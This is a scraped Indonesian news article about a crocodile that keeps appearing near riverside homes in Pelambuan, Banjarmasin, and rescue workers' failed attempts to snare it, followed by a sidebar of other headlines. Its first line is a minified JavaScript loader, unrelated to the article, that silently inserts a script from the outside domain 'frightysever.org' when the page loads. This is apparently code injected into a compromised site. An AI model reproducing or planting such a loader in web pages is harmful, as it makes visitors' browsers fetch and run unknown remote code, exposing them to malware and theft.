(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul


KANALKALIMANTAN.COM, BANJARMASIN – Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota Banjarmasin, menghebohkan warga sekitar.

Tak hanya sekali, sudah tiga kali buaya muncul terlihat warga yang bermukim di bantaran sungai yang bermuara ke Sungai Barito itu.

Buaya pertama kali muncul beberapa hari lalu terlihat oleh warga di bantaran sungai kawasan gang Safari Jalan Ir PHM Noor, Kelurahan Pelambuan. Kemudian pada Selasa (8/4/2024) kemarin, buaya yang sama kembali muncul masih di Gang 1007.

Kemudian pada Rabu (8/5/2024) siang, giliran warga gang Perjuangan Blok Harmoni IV, Pelambuan yang melihat kemunculan seekor buaya naik ke daratan dan berdiam diri di bawah rumah.

Mendapat laporan tersebut, petugas gabungan dari Dinas Pemadam Kebakaran dan Penyelamatan (DPKP) Kota Banjarmasin bersama relawan langsung ke lokasi untuk melakukan evakuasi.

Baca juga: Kucing-kucingan Anak Kecil vs Satpol PP di Lampu Lalulintas Banjarbaru

Danton 1 DKPP Banjarmasin, M Ilham mengataan, petugas yang datang ke lokasi sempat melihat buaya tersebut berada di bawah rumah warga. Dan mencoba menangkap buaya muara itu dengan metode jerat.

Namun, ketika hendak ditangkap, hewan liar tersebut langsung pergi ke sungai yang ada di belakang rumah warga.

Tak hanya sekali ini, petugas dari animal rescue beberapa hari lalu sudah berusaha melakukan evakuasi dengan memancing buaya untuk keluar menggunakan umpan ayam dan bebek yang dijerat tali, tapi tak membuahkan hasil.

Baca juga: Ngobrol Santai Pj Bupati Kapuas Erlin Hardi di Kelurahan Selat Dalam

“Ketika kami mau melakukan penangkapan, lepas dari jeratan kepala buayanya. Mau diikat, tapi buayanya cepat menghindar dan lari,” kata Ilham yang ditemui di lokasi kemunculan buaya.

Menurut Ilham, buaya muara yang muncul tersebut berukuran cukup besar dengan panjang sekitar 1,5 meter dan termasuk berbahaya.

Untuk itu pihaknya mengimbau kepada warga yang bermukim di sekitar sungai Pelambuan lokasi kemunculan buaya, agar tidak mandi di sungai untuk sementara, sebelum buaya tersebut berhasil ditangkap.

Baca juga: Targetkan 5 Besar, Bupati Banjar Lepas Kontingen Popda Banjar Menuju HSS

Membahayakan untuk anak-anak yang mandi di sungai, buaya bisa menyerang kalau dalam keadaan lapar,” kata Danton I DPKP Banjarmasin.

Ilham juga mengingatkan bagi warga yang melihat kemunculan buaya segera melaporkan kepada petugas dengan menghubungi layanan call center Banjarmasin di nomor 112 agar segera ditangani petugas. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

Terselip Nama Aditya, PKB Keluarkan Rekomendasi 65 Calon Kepala Daerah

DPP PKB: Belum Ada Satu Rekomendasi Pun untuk Gubernur Read More

6 jam ago

Petani di HSU Dibekali Pelatihan Penggunaan Pestisida Terbatas

KANALKALIMANTAN.COM, AMUNTAI - Memanfaatkan herbisida aktif parakuat diklorida secara optimal dengan mengurangi dampak sekecil mungkin,… Read More

7 jam ago

BBPOM Gelar Bimtek Keamanan Pangan untuk Kader KPS Se-Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bimbingan Teknis (Bimtek) Keamanan Pangan untuk Kader Keamanan Pangan Sekolah (KPS) se-Kabupaten… Read More

8 jam ago

Hattrick PLN Raih Laba Bersih, Keuangan Terbaik Sepanjang Sejarah Perseroan

KANALKALIMANTAN.COM, JAKARTA - PT PLN (Persero) sukses membukukan keuntungan terbesar sepanjang sejarah perseroan dengan meraih… Read More

9 jam ago

Aeris Hotel Kadung Operasi, Wali Kota Banjarbaru Tak Akan Halangi Investasi

Catatan Dinas Terkait: Daya Tampung Parkir, Laik Sehat, Persetujuan Lingkungan, dan Limbah B3 Read More

11 jam ago

Ancar-ancar Poros Acil Odah-Rozanie di Pilgub Kalsel, Pesaing Muhidin-Hasnur

Rozanie Klaim Dapat Restu Surya Paloh saat Paman Birin ke Nasdem Tower Read More

11 jam ago

This website uses cookies.